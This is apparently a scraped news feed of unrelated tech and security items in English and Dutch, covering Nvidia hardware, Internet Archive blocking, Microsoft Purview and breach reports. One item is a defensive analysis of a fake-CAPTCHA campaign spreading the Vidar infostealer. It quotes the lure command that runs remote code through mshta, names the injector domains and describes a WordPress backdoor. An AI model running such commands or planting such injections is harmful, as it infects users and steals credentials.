Check Point is proud to integrate with NVIDIA DSX Air’s testing environment, enabling organizations to pre-validate their security aware AI data center designs before ever deploying their first piece of hardware in production to build and run their own AI. Testing AI Factory deployments end-to-end is challenging and can require complex multi-vendor orchestration. From compute to networking, orchestration, and security, ensuring integrations, configurations and automations perform as expected can become resource-intensive with so many factors at play. Now, organizations can perform large-scale cyber security validation testing before deploying AI Factories, using the NVIDIA DSX Air cloud-based simulation and validation platform. Why are Organizations Building Their […]
Nvidia gaat het mogelijk maken om vier DGX Spark-pc's aan elkaar te koppelen. Tot nu toe lag het maximum op twee. Door het koppelen van de Sparks wordt het geheugen van de apparaten samengevoegd, waardoor vier Sparks beschikken over een gedeeld werkgeheugen van 512GB.
Nvidia start binnenkort met de verkoop van zijn DGX Station, een 'supercomputer voor bij je bureau'. Dat kondigt de fabrikant aan tijdens zijn GPU Technology Conference. De DGX Station zou twintig keer zo snel zijn als de eerder uitgebrachte DGX Spark.
Operations and hospital networks not affected, we're told
Robotics-assisted surgical tech firm Intuitive said that unauthorized intruders gained access to some of its internal IT business applications after stealing an employee's credentials during a phishing attack.…
Nvidia heeft DLSS 5 aangekondigd, een nieuwe upscaler die onder meer details in gezichten invult met AI. Die neemt onder meer de belichting en kenmerken van de game mee bij het berekenen van details per frame.
Imagine a newspaper publisher announcing it will no longer allow libraries to keep copies of its paper.
That’s effectively what’s begun happening online in the last few months. The Internet Archive—the world’s largest digital library—has preserved newspapers since it went online in the mid-1990s. The Archive’s mission is to preserve the web and make it accessible to the public. To that end, the organization operates the Wayback Machine, which now contains more than one trillion archived web pages and is used daily by journalists, researchers, and courts.
But in recent months The New York Times began blocking the Archivefrom crawling its website, using technical measures that go beyond the web’s traditional robots.txt rules. That risks cutting off a record that historians and journalists have relied on for decades. Other newspapers, including The Guardian, seem to be following suit.
For nearly three decades, historians, journalists, and the public have relied on the Internet Archive to preserve news sites as they appeared online. Those archived pages are often the only reliable record of how stories were originally published. In many cases, articles get edited, changed, or removed—sometimes openly, sometimes not. The Internet Archive often becomes the only source for seeing those changes. When major publishers block the Archive’s crawlers, that historical record starts to disappear.
The Times says the move is driven by concerns about AI companies scraping news content. Publishers seek control over how their work is used, and several—including the Times—are now suing AI companies over whether training models on copyrighted material violates the law. There’s a strong case that such training is fair use.
Whatever the outcome of those lawsuits, blocking nonprofit archivists is the wrong response. Organizations like the Internet Archive are not building commercial AI systems. They are preserving a record of our history. Turning off that preservation in an effort to control AI access could essentially torch decades of historical documentation over a fight that libraries like the Archive didn’t start, and didn’t ask for.
If publishers shut the Archive out, they aren’t just limiting bots. They’re erasing the historical record.
Archiving and Search Are Legal
Making material searchable is a well-established fair use. Courts have long recognized it’s often impossible to build a searchable index without making copies of the underlying material. That’s why when Google copied entire books in order to make a searchable database, courts rightly recognized it as a clear fair use. The copying served a transformative purpose: enabling discovery, research, and new insights about creative works.
The Internet Archive operates on the same principle. Just as physical libraries preserve newspapers for future readers, the Archive preserves the web’s historical record. Researchers and journalists rely on it every day. According to Archive staff, Wikipedia alone links to more than 2.6 million news articles preserved at the Archive, spanning 249 languages. And that’s only one example. Countless bloggers, researchers, and reporters depend on the Archive as a stable, authoritative record of what was published online.
The same legal principles that protect search engines must also protect archives and libraries. Even if courts place limits on AI training, the law protecting search and web archiving is already well established.
The Internet Archive has preserved the web’s historical record for nearly thirty years. If major publishers begin blocking that mission, future researchers may find that huge portions of that historical record have simply vanished. There are real disputes over AI training that must be resolved in courts. But sacrificing the public record to fight those battles would be a profound, and possibly irreversible, mistake.
Last week's cyberattack on medical technology giant Stryker was limited to its internal Microsoft environment and remotely wiped tens of thousands of employee devices. [...]
Gameontwikkelaar CD Projekt RED is van mening veranderd over de PlayStation 5 Pro. Bij de release twee jaar geleden zei de Cyberpunk-ontwikkelaar nog dat er geen speciale update zou komen, maar nu komt die er toch.
Hacktivists use proxy services from Russia, China for 'billions of designed-for-abuse connection attempts'
Cybercrime has skyrocketed since the start of the Iran war, according to Akamai, which reports a 245 percent increase in everything from credential harvesting attempts to automated reconnaissance traffic aimed at banks and other critical businesses.…
Een release in Nederland of België van de dubbel vouwbare smartphone Samsung Galaxy Z TriFold lijkt onwaarschijnlijker dan eerst. Het gerucht gaat namelijk dat Samsung gaat stoppen met de productie van de peperdure smartphone.
CISA warned U.S. government agencies to secure their Wing FTP Server instances against an actively exploited vulnerability that may be chained in remote code execution attacks. [...]
Ruim 60 procent van de websites van Nederlandse gemeenten deelt data met Google, zoals ip-adressen van bezoekers, voordat gebruikers toestemming hebben gegeven. Dat is illegaal. Het gaat onder meer om YouTube-embeds en Google Fonts.
In recent years, ClickFix and fake CAPTCHA techniques have become a popular way for cybercriminals to distribute malware. Instead of exploiting a technical vulnerability, these attacks rely on convincing people to run malicious commands themselves.
Our researchers have recently detected a campaign that ultimately delivers the Vidar infostealer, using several different infection chains.
One of the methods used in this campaign involves installing a malicious installer delivered through fake CAPTCHA pages hosted on compromised WordPress websites. We detected a number of compromised websites involved in the campaign, located in countries including Italy, France, the United States, the United Kingdom, and Brazil.
What is Vidar?
Vidar is a well-known infostealer malware family designed to harvest sensitive data from infected systems. It typically targets:
Browser-stored usernames and passwords
Cryptocurrency wallet information
Session cookies and authentication tokens
Autofill data and saved payment information
Files that may contain sensitive data
Because Vidar loads in memory and communicates with remote command servers, it can quietly collect and exfiltrate data without obvious signs of infection.
Fake CAPTCHA: the never-ending story
When a user visits a compromised website, they may see a screen mimicking Cloudflare’s familiar “Verifying you are human” page.
This technique has been widely used since 2024 and has evolved through numerous variations over time, both in its visual appearance and in the malicious commands that start the infection chain.
The fake CAPTCHA message shown to the user.
The page instructs the visitor to copy and run a malicious command that starts the infection chain, in this case:
mshta https://{compromised website}/challenge/cf
Mshta is a legitimate Windows binary designed to execute Microsoft HTML Application (HTA). Because it is built into Windows, attackers have abused it since the early days of the ClickFix campaigns.
In this case, the command launches a simple obfuscated HTA script, which eventually downloads and installs malware associated with the Vidar infostealer.
HTA-based MSI dropper
The HTA script is the intermediate stage that downloads and runs a malicious MSI installer. An MSI is a Windows installation package normally used to install software, but attackers frequently abuse it to deliver malware.
The script performs several operations:
The window is resized to 0x0 and moved off-screen, making the application invisible to the user.
The script terminates if the document.location.href doesn’t start with http.
The strings are decoded using XOR and a random key.
Through WMI queries, the script checks for installed antivirus products.
It creates hidden working folders in a random folder under \AppData\Local to drop the MSI file.
In the end, the script downloads the malicious MSI from a compromised website. The downloaded file must be larger than 100 KB to be considered valid. Finally, it removes the :Zone.Identifier alternate data stream.
The malicious HTA script.
In this case, the malicious MSI was downloaded using the following command:
The MSI defines a CustomAction ConfigureNetFx, and it executes a GoLang loader.
Malware loaders (also known as droppers or downloaders) are common tools in the cybercrime ecosystem. Their main job is to stealthily compromise a system and then deliver one or more additional malware payloads.
In this campaign, the loader ultimately decrypts and executes the Vidar infostealer. The executable has different names in the different MSI samples analyzed.
The custom action defined in the MSI.
The Golang loader decodes a shellcode that performs different anti-analysis checks, including:
CheckRemoteDebuggerPresent
IsDebuggerPresent
QueryPerformanceCounter
GetTickCount
After several intermediate steps, the loader decrypts and loads Vidar infostealer directly into memory.
Analysis of compromised websites
The malicious iframe injected into the compromised websites was generated by the domains cdnwoopress[.]com or woopresscdn[.]com in the analyzed cases.
The malicious iframe injected into the compromised website.
The injected code has several functions, and the command used in the fake CAPTCHA attack is obtained from the /api/get_payload endpoint.
Code injected into the compromised websites.
Because the malicious website was misconfigured, we were able to view the backend code injected into the compromised WordPress sites.
The injected script performs several actions:
Creates the file wp-cache-manager.php if it doesn’t already exist, obtaining its contents from the endpoint /api/plugin.
Sends a heartbeat request every hour containing the domain name, site URL, WordPress version, and status.
During page loads (template_redirect), the script filters visitors based on User-Agent and targets Windows desktop visitors.
Requests /api/inject?domain=domain from the remote command server. The response HTML is then displayed, replacing the normal WordPress page.
The malicious code injected in the compromised WordPress site.
How to stay safe
Attacks like this rely on tricking people into running commands themselves, so a few simple precautions can make a big difference.
Slow down. If a webpage asks you to run commands on your device or copy and paste code, pause and think before following the instructions. Cybercriminals often create a sense of urgency with fake security checks, countdown timers, or warnings designed to make you act without thinking.
Never run commands from untrusted sources. A legitimate website should never require you to press Win+R, open Terminal, or paste commands into PowerShell just to verify you are human. If a page asks you to do this, treat it as suspicious.
Verify instructions independently. If a website tells you to execute a command or perform a technical action, check official documentation or contact support through trusted channels before doing anything.
Be cautious with copy and paste. Some attacks hide malicious commands in copied text. If you ever need to run a command from documentation, typing it manually can help reduce the risk of running hidden code.
Protect your device. Keep your operating system and browser updated and use security software that can block malicious websites and detect infostealer malware.
Stay informed. Techniques like fake CAPTCHA pages and ClickFix attacks continue to evolve. Knowing that attackers may try to trick you into running commands yourself can help you spot these scams before they succeed.
Pro tip: The free Malwarebytes Browser Guard extension can warn you if a website attempts to copy content to your clipboard, which may help prevent this type of attack.
Preparing for an OffSec certification exam is a technical and psychological journey. Here are some expert strategies to help during your OffSec exam prep!
As organizations adopt AI, security and governance remain core primitives for safe AI transformation and acceleration. After all, data leaders are aware of the notion that:
Your AI is only as good as your data.
Organizations are skeptical about AI transformation due to concerns of sensitive data oversharing and poor data quality. In fact, 86% of organizations lack visibility into AI data flows, operating in darkness about what information employees share with AI systems [1]. Compounding on this challenge, about 67% of executives are uncomfortable using data for AI due to quality concerns [2]. The challenges of data oversharing and poor data quality requires organizations to solve these issues seamlessly for the safe usage of AI. Microsoft Purview offers a modern, unified approach to help organizations secure and govern data across their entire data estate, in particular best in class integrations with M365, Microsoft Fabric, and Azure data estates, streamlining oversight and reducing complexity across the estate.
At FabCon Atlanta, we’re announcing new Microsoft Purview innovations for Fabric to help seamlessly secure and confidently activate your data for AI transformation. These updates span data security and data governance, granting Fabric users to both
Discoverrisks and prevent data oversharing in Fabric
Improve governance processes and data quality across their data estate
1. Discover risks and prevent data oversharing in Fabric
As data volume increases with AI usage, Microsoft Purview secures your data with capabilities such as Information Protection, Data Loss Prevention (DLP), Insider Risk Management (IRM), and Data Security Posture Management (DSPM). These capabilities work together to secure data throughout its lifecycle and now specifically for your Fabric data estate. Here are a few new Purview innovations for your Fabric estate:
Microsoft Purview DLP policies to prevent data leakage for Fabric Warehouse and KQL/SQL DBs
Now generally available, Microsoft Purview DLP policies allow Fabricadmins to prevent data oversharing in Fabric through policy tip triggering when sensitive data is detected in assets uploaded to Warehouses. Additionally, in preview, Purview DLP enables Fabric admins to restrict access to assets with sensitive data in KQL/SQL DBs and Fabric Warehouses to prevent data oversharing. This helps admins limit access to sensitive data detected in these data sources and data stores to just asset owners and allowed collaborators. These DLP innovations expand upon the depth and breadth of existing DLP policies to ensure sensitive data in Fabric is protected.
Figure 1. DLP restrict access preventing data oversharing of customer information stored in a KQL database.
Microsoft Purview Insider Risk Management (IRM) indicators for Lakehouse, IRM data theft quick policy for Fabric, and IRM pay-as-you-go usage report for Fabric
Microsoft Purview Insider Risk Management is now generally available for Microsoft Fabric extending its risk-detection capabilities to Microsoft Fabric lakehouses (in addition to Power BI which is supported today) by offering ready-to-use risk indicators based on risky user activities in Fabric lakehouses, such as sharing data from a Fabric lakehouse with people outside the organization . Additionally, IRM data theft policy is now generally available for security admins to create a data theft policy to detect Fabric data exfiltration, such as exporting Power BI reports. Also, organizations now have visibility into how much they are billed with the IRM pay-as-you-go usage report for Fabric, providing customers with an easy-to-use dashboard to track their consumption and predictability on costs.
Figure 2. IRM identifying risky user behavior when handling data in a Fabric Lakehouse.
Figure 3. Security admins can create a data theft policy to detect Fabric data exfiltration.
Figure 4. Security admins can check the pay-as-you-go usage (processing units) across different workloads and activities such as the downgrading of sensitivity labels of a lakehouse through the usage report.
Microsoft Purview for all Fabric Copilots and Agents
Microsoft Purview currently provides capabilities in preview for all Copilots and Agents in Fabric. Organizations can:
Discover data risks such as sensitive data in user prompts and responses and receive recommended actions to reduce these risks.
Detect and remediate oversharing risks with Data Risk Assessments on DSPM, that identify potentially overshared, unprotected, or sensitive Fabric assets, giving teams clear visibility into where data exposure exists and enabling targeted actions—like applying labels or policies—to reduce risk and ensure Fabric data is AI‑ready and governed by design.
Identify risky AI usage with Microsoft Purview Insider Risk Management to investigate risky AI usage, such as an inadvertent user who has neglected security best practices and shared sensitive data in AI.
Govern AI usage with Microsoft Purview Audit, Microsoft Purview eDiscovery, retention policies, and non-compliant usage detection.
Figure 5. Purview DSPM provides admins with the ability to discover data risks such as a user’s attempt to obtain historical data within a data agent in the Data Science workload in Fabric. DSPM subsequently provides actions to solve this risk.
Now that we’ve covered how Purview helps secure Fabric data and AI, the next focus is ensuring Fabric users can use that data responsibly.
2. Improve governance processes and data quality across their data estate
Once an organization’s data is secured for AI, the next challenge is ensuring consumers can easily find and trust the data needed for AI. This is where the Purview Unified Catalog comes in, serving as the foundation for enterprise data governance. Estate-wide data discovery provides a holistic view of the data landscape, helping prevent valuable data from being underutilized. Built-in data quality tools enable teams to measure, monitor, and remediate issues such as incomplete records, inconsistencies, and redundancies, ensuring decisions and AI outcomes are based on trusted, reliable data. Purview provides additional governance capabilities for all data consumers and governance teams and supplement those who utilize the Fabric OneLake catalog. Here are a few new innovations within the Purview Unified Catalog:
Publication workflows for data products and glossary terms
Now generally available, data owners can leverage Workflows in the Purview Unified Catalog to manage how data products and glossary terms are published. Customizable workflows enable governance teams to work faster to create a well curated catalog, specifically by ensuring that data products and glossary terms are published and governed responsibly. Data consumers can request access to data products and be reassured that the data is held to a certain governance standard by governance teams.
Figure 6. Customizing a Workflow for publishing a glossary term in your catalog.
Data quality for ungoverned assets in the Unified Catalog, including Fabric data
In the Unified Catalog, Data Quality for ungoverned data assets allows organizations to run data quality on data assets, including Fabric assets, without linking them to data products. This approach enables data quality stewards to run data quality at a faster speed and on greater scale, ensuring that their organizations can democratize high quality data for AI use cases.
Figure 7. Running data quality on data assets without it being associated with a data product.
Looking Forward
As organizations accelerate their AI ambitions, data security and governance become essential. Microsoft Purview and Microsoft Fabric deliver an integrated and unified foundation that enables organizations to innovate with confidence, ensuring data is protected, governed, and trusted for responsible AI activation.
We’re committed to helping you stay ahead of evolving challenges and opportunities as you unlock more value from your data. Explore these new capabilities and join us on the journey toward a more secure, governed, and AI‑ready data future.
Companies House, a British government agency that operates the registry for all U.K. companies, says its WebFiling service is back online after it was closed on Friday to fix a security flaw that exposed companies' information since October 2025. [...]
Apple heeft na meer dan vijf jaar zijn koptelefoon AirPods Max een specbump gegeven. De nieuwe koptelefoon heeft een H2-chip in plaats van een H1 en dat maakt onder meer gespreksdetectie en stemversterking mogelijk, zo zegt de fabrikant.
Interpol says fraud schemes using the tech are 4.5x more profitable
AI is apparently good for the bottom line if your business is crime. Financial fraud schemes carried out with the help of artificial intelligence are 4.5 times more profitable than those that aren't enhanced, according to Interpol's latest estimates.…